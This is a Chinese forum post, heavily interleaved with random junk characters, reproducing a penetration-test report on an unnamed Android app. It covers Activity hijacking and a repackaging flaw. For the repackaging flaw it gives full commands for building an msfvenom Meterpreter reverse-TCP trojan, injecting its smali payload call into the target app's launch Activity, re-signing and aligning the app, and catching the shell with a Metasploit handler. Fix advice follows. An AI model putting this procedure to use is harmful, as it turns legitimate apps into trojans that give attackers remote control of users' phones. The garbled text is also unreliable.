# I. b! V3 s7 n4 e t ! T8 l1 o x9 M8 w; }) f

8 h0 h* C. ~& v, j& ` ' W' |; l2 G# W' {+ h* s; y   U n7 z8 z" J3 j! X1 c; m V! g0 d - P/ y/ v2 A4 h* k4 t1 X9 g

; B3 [& {6 `0 l/ m+ B3 K6 B g v4 m |2 F2 |7 f- [, u, [

e" ?9 T. K! Y, o/ g+ ]; S$ H h8 C% \. I- Y 2 检测结果                    3 [& W- I" k1 K# p1 N 0 e; g4 c2 O1 f' y8 R* B" k# ~4 ~

7 E/ a2 ]. b1 \1 X1 r0 @7 H ; I' ]8 g7 c: t0 Q7 m: l) [

1 J I( L. Z9 t; V" `8 F2 C6 G' q& m/ T: T% ~ 2.1 某某某 $ d- w$ a8 q% E7 N+ O ( h1 X5 W% b' A3 s L# t

' {5 ?; Q+ M( Z+ ? 8 j) x3 ~# G' L

3 P) r5 m: G, U+ o8 U6 e# }$ D ) ?3 J4 l1 s+ z$ \; d+ \ U 2.1.1检测目标 / ?. i8 |6 z& E& z" ^ " \7 L: c; E! J0 |- G. Y4 |1 i! J

" U5 a' ]' Y5 R / W! m1 Y$ I0 ~, J9 z5 v) m

n. N/ Q9 h* |3 ~& W 4 G6 M7 j. S4 [/ A E 目标地址: 某某某某某某APP ; J* E/ s8 i2 h% }. J- f T$ t

% C* |" R9 @: ?& e5 c& R, P3 `$ n& {6 g. }( O

' u; x6 P0 ]) ~. Q$ L, W) X( u( O1 ~7 x- x 2.1.2检测结果 2 j2 g, t+ g- _1 j* H2 X: k: ` - z, g( d; U, W' Z8 l: h% I: ~

7 E; N# z. z: C: Z8 X2 D+ R ; f& T/ U0 O9 W

0 f2 h6 j# _( j/ ^ 3 z7 v" _- g1 j( G 2.1.2.1 2 m$ \. @& |2 v K ( ~, [ O% e1 e2 M0 X7 \- f

+ `3 E# M% o" _# ]1 w# ?' J. Y# i 8 R7 M& }9 D' a/ C5 [, Y8 G( C( v

6 [# R. A% ?+ }3 X. w, ~4 V& o& o3 ]: Y) M5 ~/ ]- V% i3 z 漏洞链接地址:某某某某某某APP : F" l; ^5 `# [( u- q / S* s1 ^! F9 D. ^( ~0 _

( R1 l9 n9 T% L( k) @+ H; J7 Z! i: e : \$ e# F& x |, y% x& C' [9 V

, K4 q: }: i& y# R# x% I1 ~' L 5 X1 [. X' x. q* F( b, W   * A T5 s5 \, N8 P5 w" I7 K . m# M# F1 C& a9 _

G; t# _' j+ k* D& H m" g4 ] N3 ~* n1 v* Z

- z) _+ \7 s6 F- F0 S 0 w8 b( l1 l3 E1 \, @ 漏洞分析及取证: 6 l, Y1 I: z3 }& |8 y2 W: j" Y5 n3 l

. x' [4 M8 p. n. ^4 f: G) E9 M: F, _$ W7 s2 D, b3 ^0 t# C- [

2 Y) ~, f% H$ u h$ s* E- {5 G , t1 Z' d/ u' _+ C H6 D2 L7 c                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 4 {) M5 {: l% S3 s! r ( v* ?9 W" [5 u; s2 R& u

5 R1 \; z0 u* _4 \! Y S6 ^ ( f# Q% p% f- t: m4 r. ]

7 L+ i' l) O3 ? g1 f! y+ D4 w0 v/ J& P o8 x9 ]' z1 x4 E1 W      0 {0 S3 T3 P* O$ V! _( D2 y * c0 K Z9 D% b4 {% ^

3 F' k F+ q4 d9 z9 D# Y5 T( C T1 w' Y0 H& g) g* ~

7 h. e9 X2 O3 z$ j$ f. T+ w + G8 Z* R/ R7 A* u% K, ^                       9 V( G6 v* I3 U5 [8 w7 b* p G3 ^ # y9 {3 `9 a Q9 N( o" r

1 `7 S% y' b5 p! ] E' ]& y: l* n8 c; Q" u! ^% g5 T$ I" w

3 |" C0 y9 W0 f! q/ [% [ # Y) F0 x0 F5 |8 b 3 [% L* J8 U" M0 w- {' l 4 X7 k0 T. i7 ]" |3 u* n

0 A9 L5 i! b5 L% n% J$ A& ?3 E $ i& z, H( D9 E5 @! w- D; ^9 c

5 p# @" s' X& f2 S/ }4 L 9 G7 Q( T" ]2 Y$ [2 ] ! w1 ^: s* R% {# O, x5 G0 T 7 m; o% H2 K9 U: g2 {3 K1 i

' O" J$ i3 h) x& Y7 X( t$ ? 6 K3 ^ d2 {1 E0 v w

5 t8 \5 [% t1 {9 b& B3 H: U! `/ g9 e% W ! ^& u, H4 T; x % W" W( W0 J6 b! e( |" j7 b. q

5 P7 k9 J, e( T. l; i ) x; T. p7 x( K% S* J

" {8 M2 T+ g; L/ e. u! ] 3 I; l: L p) @6 a9 r 漏洞危害:高 1 D. e) G( ?6 i, d( ?1 h 5 \0 }" ]. o8 } y' T

) q' \. k1 e/ L# I0 ] + e$ y L+ ~& q! z) W7 M) N) Q, b
* {% t$ H5 [3 N3 {5 N3 i3 L2 Z3 h: u4 m X0 a" c: r / ?- j: e- C: T9 k3 |$ B- O! r4 Y8 v; A; b$ d; }1 W6 a4 t/ x9 ^* e3 z$ i3 ~& C/ M4 k7 D* _5 L0 Y& W8 t, U, W+ [" a n& |6 ~* i5 t" W3 [ j8 C' [% z1 c4 A* ^' A6 o; ^6 n" ?* [3 o0 f( D6 V$ v2 M3 q2 d9 E" A9 P! L1 [+ J* }8 z/ C" M! x: m) p" b$ Q! T; k% `0 h5 K3 n6 m' F4 t. j: x) Y% H9 Q/ a, M. g+ K# C; m& l( [2 o {! _: O5 O w* Z; I* l! b9 X/ N* R# B; n b. b2 p& ^' _7 K3 T2 C$ S3 X$ i! L' q g- \" @: g M0 l# m+ e. W3 Y6 E, H8 v0 }* _8 ]8 U' D. E6 y0 [! I" s0 Q* D& T. n8 `; |: R* @2 _& J) D, H* H. X N w. k X3 r, j& I- U& [ J( \! }# A. ^# o0 E9 ?, |% v- G8 F1 E6 u( n* v) z# c5 ~0 E+ Y( @8 w$ ?2 x; R+ Q
5 `# i! \9 Z; t/ K7 } + n& o! p6 \, w" H2 I3 q1 \

) b4 U% T8 V0 x: Y" h% f g" W0 e , e, N' |2 \# s 严重程度 8 ^' _4 E3 ]8 A( D ) Y% ^( B6 n9 n( W0 Y2 I

* W: S( V6 ~, l4 T) m; L% F( k. V0 H1 A9 _' r1 ~
4 i: Z8 |, I$ q- Q" a4 Z# x/ V & J( {) {/ x1 c$ c' ?7 a' \ y

( y2 R& \7 G' \$ M. _+ T; E1 C2 c6 d. }' }6 i+ a" r# p* T# c ( N. g' @$ C; h - X; C3 r h6 f, w* _6 h

) P8 b3 `4 F ? 5 T) Y+ ^, a' N0 r' X1 W4 ?: w8 v! ^0 B
* C1 d$ U* t( f5 a) ~, n) X 8 b' w( ?' c1 h" m

. ?4 I8 ~8 r" J4 V/ ~ + V) B9 K& p% {4 W k. O5 K- v- @* [, a4 _) m/ U 9 w/ f+ ^8 P# V B# ^- V- l

- H( p9 n" k4 v# f5 n " R! C6 ^* M& K$ [: _' t/ \
* @/ B# A* g& m( H; [ / E0 }! Y: M. {, ?+ u& p. z5 h* O

" y/ b; w6 [, f$ y1 i7 i : }2 y* i# m% h$ Z& c. z) s 5 D# M3 {, C+ K5 X ; p8 k: u" O; |9 d3 J

' y3 \* A. m3 D" F# ?2 V + t( K, R9 x6 T
! T, D0 N O: [# n1 z5 F& N8 S* [+ ?* [" m8 w f$ R9 a% i

! R) ^( F3 ?& P0 p* Q) {3 E ; F& U' a" n: U3 a7 l* ]; P( {- F$ s T   4 f. O( n# B& q: R 9 M( G- P/ c+ {: z$ T! x! J

2 r0 G+ y0 G" Z/ i U ( L* G/ D" S, \% ^5 }
4 {5 d% w% ~+ }$ b% H+ k7 k0 j 0 f6 O0 \+ M( C7 w/ v V

; A/ F! f, G7 ~! {$ ~4 c. a3 R! `5 d9 h2 q9 e9 @- a 7 d4 v2 h& g0 e& p/ H / M+ e$ t* |# J7 S3 L& s/ r7 ^

* o: }9 ~3 m" l3 D$ F# |% r8 n6 _8 ^
|8 v$ s$ I* w* G9 N5 `2 G- T # l$ K. \! M; g- h

$ W- B# j7 U$ |) | * P H4 t' U/ V- }; ?# o   2 |0 B0 e8 q0 z/ S+ f# P , D, i3 Y6 y% h9 s5 E7 x& _6 c* X: L0 U

, F! U4 S- ]1 ]9 z. a/ ]9 m7 c) u% B ! x d- f' A& \6 D+ y; y3 o
" H0 X0 X8 M. e3 N8 S5 Z% P 5 `+ X. s% z, z3 V. b
: h4 d/ s. D$ i' J" ~2 L$ J3 g y( q3 d# ~9 s1 `& b

( [# Z+ O( q! o- q8 f/ { ' r8 w4 w* \' ^3 m) \   + ?$ `- E) O/ q6 T+ i8 I+ Z9 X5 ]! D) @1 o+ J% H: Y

6 ]& l0 d4 a$ A" y' c, g" Q 4 T! ?& E0 b' O# j

* K0 F) X1 t D3 f3 J, C 2 E1 h5 K% _5 Z6 M5 \3 i 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 3 u; B5 }6 [' M , P0 @8 Z) |2 d

) W) w, v9 i& b 0 m x. A3 p7 w6 B* Z0 C

- Y5 H. Z6 e M1 n' r( w ! Q( @" D7 s# n" @8 \           ) j e/ M6 X+ \: E$ ?$ J7 m" T, d9 P' o

' c- O- P, h1 s% A! v, i$ M- ^6 v. k3 D1 b ! O0 v$ m6 k W4 _1 p7 n

# [; ?# z$ m; B 0 ? s0 Y5 X" V$ s2 k( z- n( }3 ?   ( J6 @% d/ p0 {9 W; b4 d O8 Q6 a7 _3 [! N5 ]% f2 F

) ]7 D2 l! c1 S; n. c0 [+ W9 v 6 G( r0 v$ l+ J2 h. v8 _: D7 ]

, }4 p6 J6 S; i% L + |: u5 R# C ?: R 2.1.2.2 8 w6 H/ D( p5 H$ w 6 M ^4 G, N' S& D% b3 D7 A* S( [

$ t& [7 }) P! G ^ [ # s. @" j) ]! e: c8 \# o

6 i; c; |) N1 h; L# a9 Z 4 s- y, Q2 s8 }8 _5 [ 漏洞链接地址:某某某某某某APP , c5 F7 H- i( m1 `3 s ( q7 C0 @4 ^7 R: ^& o( X6 c

% U) U' g1 h# W$ k 4 y& U, G3 T% o" a$ e

7 q2 j" ~$ P" Z0 t9 ~8 U * B5 e3 ~6 t B' d( F 漏洞分析及取证: 3 P0 q9 S# g$ N0 I3 d- }, f % v* ^# a7 \+ H7 X

1 f @. g5 W) u4 V& d. g% K: X3 V ) }3 \& D$ e) t e8 s

8 B. U# z/ T* q- ]+ V: Q/ O/ J3 F E7 c1 d, E, j0 M4 T                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 6 K$ E! X1 {. L% G 3 ]# p% ^' d+ } I/ M

. |6 N. B$ p* r: K2 ^% o4 y) t5 ^ . ^0 D7 R% P' K( ]

5 S9 v& b" h! w, l8 F$ ]; R5 A + c5 ~" g2 f4 K3 m% K m Metasploit 生成木马 apk * C% t2 U* ?4 I+ B3 O% A- r 1 m6 c0 c7 y; X; ] q

7 b* `# J' G2 z" T6 Q, X7 z " `2 P7 c! @, k* A# l0 }

; ?: W% r% Q+ C8 O$ Z8 n* s! `% k( h% Q. v* K msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ( |/ L0 d4 N* O6 U f 6 Q$ S5 }: a; e( c3 ]. j0 }

: s5 F& ]3 q( q- ]$ Q1 | ' A8 V( U" S- X- _, M7 M

( @1 c( q& }- V3 ^ 3 _/ S* a5 M, i 反编译目标apk和木马apk 3 E0 |' `% {0 |" i2 N ; h$ J! W- i" K

4 A$ ^4 X: a) I6 h! V( f# a9 c9 s

7 z0 j' [& K) q. X# p $ w- l8 X. J, R3 d* v, |2 T2 y apktool d target.apk
& _# K) p! G$ x! k% z ) |, g" `. O+ x6 s- m apktool d cockhorse.apk
( j, T; c6 L, s * U( @ z1 `& m4 M N8 c$ A

/ P0 n0 L; [" L, p! |6 r2 H. p$ P* X/ F2 D- a( D

$ P# |4 q- x. d q: w/ W% `: v( L7 W- j' y9 Z. s 木马 apk 注入目标 apk 3 r5 N/ ]" O7 J1 A5 Z. A# U " l* f4 m& @$ y

/ V: g( v' N6 h , A! o+ d, S7 n* g. N6 j

5 _8 a- E$ g8 J4 j) I' i " [1 Z/ b" C1 d* o 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
& m( i; p- i& I. p 5 ]" h3 K5 J- [ v, p0 E invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
3 y6 C. J! e( O) G6 Q3 E+ K + m0 U9 S8 Q& c

; U( U. p, @3 d, R5 ~5 @/ U 2 a9 z H0 ^! }6 e; Z; Z

) ~0 _- [& v9 j1 @' y / Y1 V& c9 W7 e* U' v0 J8 X 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ! ^ @2 q" [- ?& h ! h: G! R/ J0 f+ p* H1 l# b1 v

. E) \. W% X% b5 l8 m+ f! ] ( V, b' X, {: i- i

: v- j' z; j4 X7 q0 k$ N8 I# k7 d 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ % `3 I% Z1 R& m 2 O, \# Z* n( I7 y5 L

8 c/ c" t$ _( I/ x ; J r8 D, l" w4 E5 `/ L- w3 c

% z0 @! [/ W8 Y0 N, _5 X # m- D, j% Q F9 }1 Q 回编译生成最终 apk 6 N: k. l' h, k4 o; o 1 O6 _0 u( z1 R N

" `4 K O0 z, l. @ 1 x4 v8 B$ d: n4 t6 N; b9 R) Y

C' X0 f* |9 \: r& p- }( ^ & f% S0 F K4 d! q/ X 重新打包 $ [! w9 V3 M( u, V . z" D8 j4 ]: y( K; h: i

6 ?) {+ M$ y1 _' |5 O0 P* b 3 R4 _* K( I" o* C+ o

( r7 U6 R. b+ k7 k" L! U$ a- `* }& e! A5 x$ c( `, K apktool b -o repackage.apk target_app_floder 2 N- ?* c/ A) b, Q* W+ A3 w. g, O: n! v h& _: h H

! l9 g5 o- H) C! ~5 L6 } # i! ^8 q- \ w3 ^

: W9 b: u: w# q9 b" z ~6 ~; e- f4 e0 T8 c1 B0 g! _ 创建签名文件,有的话可忽略此步骤 : n8 }7 ^+ m k: a, k& l $ l6 E. _% z$ }

' G- q$ u; }! F6 P. b [ , g3 O- x8 z. g" c- z: t6 E

1 d$ A0 B1 A3 ^! q- ?3 } , y+ f# {* N5 L, q keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                5 s' j6 z& A( p8 c 9 V6 H+ x. N6 r1 K. L. u. Y7 \

! u! S3 q R% i& W8 B$ d % S0 p3 ~6 m F5 N) Q) v

, X" o% P( B8 u6 {; }8 a8 v# p7 G: D$ R! N+ G, p9 r1 ^$ i 签名,以下任选其一 8 g( c4 o- {- a6 L- v; j, ^: V2 P

' N. O) r3 }9 O) ?' \ f% b r 9 o9 L4 O& g1 r: c- { e

& R: L+ O! x& ? & {- j1 S( {2 K5 C" O* _7 w" ?- f jarsigner 方式 3 t5 X m3 M# |& a! P+ m , C7 c+ c- l' D% ~

+ n2 P& k- k* O3 F8 @# E( ^- H; `- _ 7 w) U; o+ g6 l* n! a

' @* c. b6 ?: r3 w* C6 z+ i. f% u- L* o jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ( d# N$ `' Q, c& w+ m 5 R. D$ O4 H! F% D- j

% l5 Q5 Z/ c9 j, L! R$ t: V2 D" x+ ]! }* H

, T& |9 I- Q7 U$ {4 N7 x ' M4 l4 b& u( _0 H; o* E. } apksigner 方式 4 [0 p! [" C6 k* F) o ( Y4 o3 ]6 y& B6 N

9 @9 U! B" r/ }1 D- p! P! N7 X1 E0 [( N; \, Y

; R7 I1 h6 f1 i; f l3 [ ( h: P; H6 v& X' T apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk " L) g' V2 A9 u: D+ f5 T 1 Q/ |' r' m( T9 a; `3 ^5 T T

7 U. E& K2 H" U3 H0 G4 P7 d 6 V: n0 g" S4 a4 S) l

( h+ z' g6 \" X! c - ?0 z4 W2 M7 f a6 D 如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 {2 ]+ S6 U- o/ I" h+ S, T7 w$ ~ ( e; O6 v0 X! v V: y( g

, K9 J$ n0 G8 v3 T+ F % L, D' m8 f) b. T

& s1 Z5 t2 z( t' C. r% N8 k1 k7 g$ O9 g! L 验证,以下任选其一 4 R- X4 B) s- j- ~+ _/ ? g9 @2 r 5 e, J( z% x. H5 y) m& I" ^+ w2 [

, ?% s; P; B1 ?; b3 i9 q# u, {' I% F# P: H ?8 V# I% j4 K& H

: F! E( B! K# D3 i& w) Y1 p/ O3 u& m( f2 W& R) R8 e# Z jarsigner方式 ) ~ h" U/ d# z* P* M/ O 7 {1 b( s; P6 `) _

5 ?: P& R& S1 `0 x3 n( o $ l( l* i! ^# P4 V

# h' N2 W) W' R: [7 @% J3 R- J8 c3 I/ s- D6 Q5 y$ l4 r jarsigner -verify repackaged.apk s9 Z, D9 R3 J9 w( }0 v$ }! c( F. M, Z, K

; v) ?# j4 ^) e4 Y! p9 @7 V / q: I( S4 ~9 Q1 k

- p9 ^. a/ _( c- T+ i" C% j( f: I! W" Q' `3 w- ? apksigner 方式 7 R/ L3 o0 P+ q1 L6 b 6 }0 f$ {" X% W7 ?# ?; B4 ]* u; }

. X$ X7 Q7 d/ u ; s( i, k3 L' P2 W3 ?, U; c. e

4 H5 [- u8 X' |: R+ K2 t% E! x 6 e0 z+ t y% K1 C6 [" A @ apksigner verify -v --print-certs repackaged.apk 8 e( Z! C# O" W: p- s7 X9 [% T" \0 {8 T* }- G

, N7 q, U5 B) A, r4 \6 z8 y, Z9 i9 l: ]: }3 K- {1 r

& {% V1 X, H/ R$ \6 @* U6 P$ d8 N W; f7 e( f- v& l: ]6 r keytool方式 9 h# [/ B& V( |8 ^& E0 y3 H5 N 8 C ]- ?5 D; H# L. E4 y% q

' y4 z7 h1 Z& R7 p6 n- m+ e5 w$ ] 0 y& H% ?& Q* q: \

. ^1 n) \# {6 Y7 x, b3 l0 |* ?8 H" n2 Q. }: K( d keytool -printcert -jarfile repackaged.apk & Z1 g( |# `" O' {) M, h + M' M4 K& ]/ Z( @0 S

. X; u; U0 P0 w8 w- J3 z1 \- C% \; |% M4 o8 e# R1 T$ u' }& L

; z" y+ Q2 Q' j' E6 `" Q ) b L* S* k% m3 H, D2 x 对齐 " j$ f3 N5 M7 }3 f, l1 x9 G 1 [# G- U/ z. `9 z5 B$ ~

! w$ q2 I- r8 w6 T* ~ + q- g. s0 J" }9 N7 u& O

$ L& o; k- i5 S! j 9 p) m. J9 a+ U. i% q 字节对齐优化 ; g! |) [" U; B* g 1 W6 V1 M& ]8 c" T$ z& F

) q- L" d, o2 g K $ m" j. G. }1 g

, [! d& C- Q9 Y5 o% }9 x# U2 t/ `5 o) `( |3 e0 X8 ]! P5 L# E* r zipalign -v 4 repackaged.apk final.apk ; H4 Z* W4 ?$ G# l; X% u6 `' H6 l- a7 _ j" ^

( G9 [5 X( A0 W( s b, p6 Q6 B" j( J |( _+ q5 x3 v" g

! [# ]+ z7 t* S2 w }" v 0 E, |) t- S9 h+ }5 K 检查是否对齐 + @2 j% t( L# Q8 D7 A& M 9 _: t8 q4 J# m' f0 ^

7 {8 s% J/ K0 C* z: _7 ?. u9 G3 b

6 }8 O! X2 T& j$ \ : ]' v: S- @4 |' X zipalign -c -v 4 final.apk " x" G+ ^2 o6 A9 i " x2 X e- k+ E4 X

$ I8 b& w/ c5 i" t6 L+ g+ y( I 1 Q8 m6 j8 r% y6 a2 g+ Q- b

$ a4 T0 N! g& Z2 ~' ^# J ' c# f6 S6 e' J* S z 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 - R' Q* R( q! _9 {1 Y' A5 |' a7 {- y9 q ' f; t( p$ V9 d# A5 a9 u

: t" ^" N# n# n2 B! A# N. w# b ; ~ E' _6 E, ~

, F. D! A* [; h$ V 2 X0 V# ~8 }! d. ^8 G0 j 启动Metasploit控制台,配置参数等待上线 + ^3 s# ^/ n% t 4 V, r/ s& F3 z" x5 E/ M z

* o ]& z( n1 w- }4 K" B . S$ R6 J9 ?( [2 N5 \

j( J/ s( I1 C' f) N5 J- g- x* `5 y0 `# n 在终端依次输入如下命令 + a. [. m4 u8 E/ a& O; s4 f * y# {9 w: o: k

6 O0 H, @" F2 E, P) m $ f: }6 j7 M' \7 b

% w: Z4 W2 T! D: T$ S( G - G9 e0 p! U/ Q: P" @ msfconsole 5 D: _! X2 G, I' o# ?: I/ | 6 y- o0 q5 s4 [1 I5 T* k% N

$ R- U; i! c8 H# \+ W2 U# M3 q) p

I/ G! G$ n" j, `7 [1 t k4 Q& G; i, }6 K/ ~( { use exploit/multi/handler 8 [6 Z% z: x1 Y a- G* t) V 5 G. d4 F9 y( e+ p% _5 D

8 p' s( l* i0 V3 @; { 1 M2 ] X- z: L% j# |9 D5 k

. F( A" [' z' a0 ` 3 ^" ] |6 R& X) X set PAYLOAD android/meterpreter/reverse_tcp $ K. {1 l9 e! g+ O# u 6 s: L5 z, r0 Q4 }/ G4 D D

& m% j0 W2 G( \0 W9 ?5 `% k$ P5 J+ h: y3 n1 G5 k- q& S

% m3 @5 B! m8 B' M) S, S" Z 3 d1 t- J1 a! p' V set LHOST 192.xxx.xx.xx ! E0 t: n+ }6 v/ E 4 v" o9 P1 f9 u) k0 |

, `' K6 ~ X9 [5 U, m2 K' Z & |: I, j# e- {9 c1 Q5 K# a+ I* L

# Q5 W: I6 j. g1 a7 u g! x7 I . }: _- g9 r' t% D D$ l; u% u# y/ P set LPORT 4444 9 Q" E/ C V' N! e ~- D& Y$ @

1 z$ Q9 O5 Z' }2 r+ J! `7 q 6 o0 G6 h# s' b3 G

: g* v7 w I3 G" A2 Q2 p ! b% D5 X; E3 ^# Q' ^. w6 s m exploit 8 ] j: K1 h2 ]3 ? 8 V1 `9 T- w- v/ u

: {1 V2 d, `$ o$ u& O4 \2 c ) \* I, j; k. X7 A+ _' [

~: r f) M' W$ v E# c5 b , `3 R. U- U; S% R" F$ P& \ 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               / t6 n1 w) s- d4 p5 _, z7 B : E7 Z& [4 m/ e- ?! i' _

% ?; @# m. _. h( D( J, z/ L & o$ L X! q' e& o

% T" v' ?9 P9 w9 l3 W 4 D8 I/ s0 p- G" Y ]; z 漏洞危害:中 - g1 b( y+ L* o) I # [/ D t. {* U; d3 [% }# s. Q5 [

) L/ A5 G* K- g: }/ Z4 \) M6 A' S! Y% C( O- g9 \/ B8 O! v* j
0 G* { Z' |0 ]/ G+ ?9 z5 p- f a & |5 m, \# }' Q) L) r! z+ v - L4 [; ]3 d8 Q# P4 U1 u : x2 M7 W- y! F- Y5 U j( b- S+ z! q+ k: y0 n& \3 V- N8 G: p) r6 R* L/ \* s1 n# ` @8 [7 H, d% W1 H8 t) p6 }& S D' e% G0 U# M9 G- R( F) z3 b3 j/ ^( S+ P M) p( s& @9 T( U) \7 C( [& f3 F. m4 n. K0 x3 K+ L1 L% P' G+ S* y. P' H+ ?# i/ X/ o o. O5 w7 q Q' N% N _: V: r9 ~# A. {9 u) M( |+ ~2 U0 o9 \4 T7 O7 \' T! D5 w* h. {' O* k8 b/ h& Y6 Y7 O& S/ G0 m' g# o+ `; X9 O$ U1 x, ^, c z% N- i/ Y7 j9 K1 B9 v2 d8 _9 R$ Y; ^ j% F5 [, ?2 Z Q7 W5 f6 j' i5 k" Y" ]% S( N v% o* c. L- r9 X, a G2 h6 U0 B8 S! h2 z+ W- M) a; V2 o L) K; t: P; ~8 t3 Z8 C9 `# M4 L# V u& B: a$ V- `& z+ y
- i2 q1 R% J; i * H5 g9 g6 u3 W6 m: s! K

; y) L# i: ?, l$ h$ I& T9 {! S2 J* x$ n- @ 严重程度 + a' e/ ?* a/ z! S8 v2 s* H* j; F

( Q! ~' T( H2 Z3 { Q3 b$ h7 x3 [) }
- V# W. F) H3 l- c' F5 \ " \' O# [1 Y" E0 s* n

5 t( ]2 ~$ t8 I4 Q* c( \9 J 8 l" \1 m& U2 z, m; J8 [4 z ; F; w: I# u ?; s' h: I" v 1 P2 a# Z4 }: v% \/ s# e! ^ Y% ~

% h p* @4 b8 Y, R# | 7 g3 q6 c( ?1 R
1 e* F5 m) o/ Z5 g ! x1 ~0 |+ g& U5 v/ Y7 I* @+ o

4 D' M; g: n5 }/ K1 t- o C/ p( I" B5 B ! q' {1 D6 o4 B& E5 `! b- k : h+ D y1 ]) E) a! j

6 a5 P5 @! m! c! g9 X _# j+ J) Y 3 @0 V0 K( y( T4 S) ]! O4 |, Z- D4 H
% g7 u( e/ q8 R1 {1 K/ v+ q# p2 {0 r# T+ r3 @5 m& o

/ ~: o) e$ I" }- Z, H) `4 |/ E7 k$ D & w: H: d" Z- B0 ]+ a) u 3 Y0 q0 y( t: A" R* v+ y

; y) b& Z2 F+ B0 @: a# {, O3 y n Z% ^2 i& O- d7 Q
7 s: } T5 c. M6 G; o) o / e7 y+ w' N, t. O( { q9 v/ n1 l5 R* Z7 o& u' o 0 q$ m! N/ C! l/ B$ b

; O: B6 N$ E0 K, A! A+ [ 2 K- A% K" B9 K3 R! r& O1 n   0 j7 F. Z, A9 S" o3 b" q ; m$ ]9 o# J9 S5 P8 u" Z6 J

7 q( \0 ^3 X4 H. B" i) |# b* y1 S# @% ?2 k- W K
& F& e2 F% M9 J; K' | ! n& I! }* z' _, y

4 [! N: I) [# j# c , B: x$ @( S8 D# a3 _3 Z : E. c6 Y6 a# f/ o2 M3 ?0 L* u3 h1 y& ]* c/ j( g; ?% H

( w) q. g! B% i+ h: Q; Z3 q" ]3 X" y& f4 J3 f# ]% L6 w. r
9 i$ e# J* ^; r+ d& t - }* q, P0 t+ s+ Q$ H9 p7 F, D % @3 M" X) _- N" S& C# L. o& B) y% q0 s6 S# x

/ s5 P7 `$ E' @, _! ^+ X0 j: x. {0 q) j* b' m& T- s- g   ' N! ]* T; e' i9 N( k: ^6 D5 N1 A8 O, U \. B# A1 S! o3 ^

/ |3 f3 l5 H# s4 D% f" r % ?3 I0 m3 Y1 U0 M
' |- n+ A% A( T/ j8 }0 R' [0 B : I+ p% K& B% I3 B3 `1 ?7 ]
0 h3 d: p$ L$ X8 i; p7 j8 @ 5 x% G6 M4 ^! ` B8 k

0 w, M5 |" @; ~% T . H* Q y- o+ \$ Y   ( o, C/ O5 {3 w2 m3 \$ r J4 `" u. q- ] ( ]5 s! a2 Z- h3 {! ^

$ D0 l6 N( J4 h/ ]0 W ' S2 l8 s" u% d

% i0 d- @; v; O f 2 E6 i! B" P0 O 修复方法: ' e3 M3 H+ Q: n. P5 b1 d8 a ; d: B: u! Q, g$ x0 r, n& p; @, l% c

- B: p* l J+ J1 L 8 H) W% ~5 w( n' q; d, k6 f

5 V( s' x+ A d, C ! X* q/ x2 c, |$ \               1. APP 启动时应做签名校验防止二次打包。
* X' P4 x4 T6 ]8 ]7 L 7 G7 q' W0 n6 o, }( d& C7 b 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ; Z4 `/ L2 S ?+ N* z1 ? 0 @% x$ X: U5 ^+ p" z

- k# \' d3 W/ N6 _) A3 e$ f 5 N2 Z2 `6 F6 C9 V & F y4 z( F* T- ]8 T / k( T3 r" g6 H! k K

8 c# k/ ], }/ {: N ) u$ ]% N5 M% V   - j$ e! c) o h: N; `; G9 k ( u! ~- p! A" n! U* [! |+ F

9 V3 ?8 s( T2 e7 A! r, l ( T9 F8 R4 S/ A/ _/ Y) y0 S % U+ c# K: \# ]' N6 u: d! m$ z/ Y0 L4 O8 ]7 p6 n7 T

/ b2 P8 b% K) Y' |) F+ P4 u / P0 S: `9 z" I' z" ?, ?
4 I J9 R0 c0 W' K% @7 F1 y- a: L# ] T' k

% ?. e+ O9 Q- X% G 7 P. O9 c- F% p/ |% n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表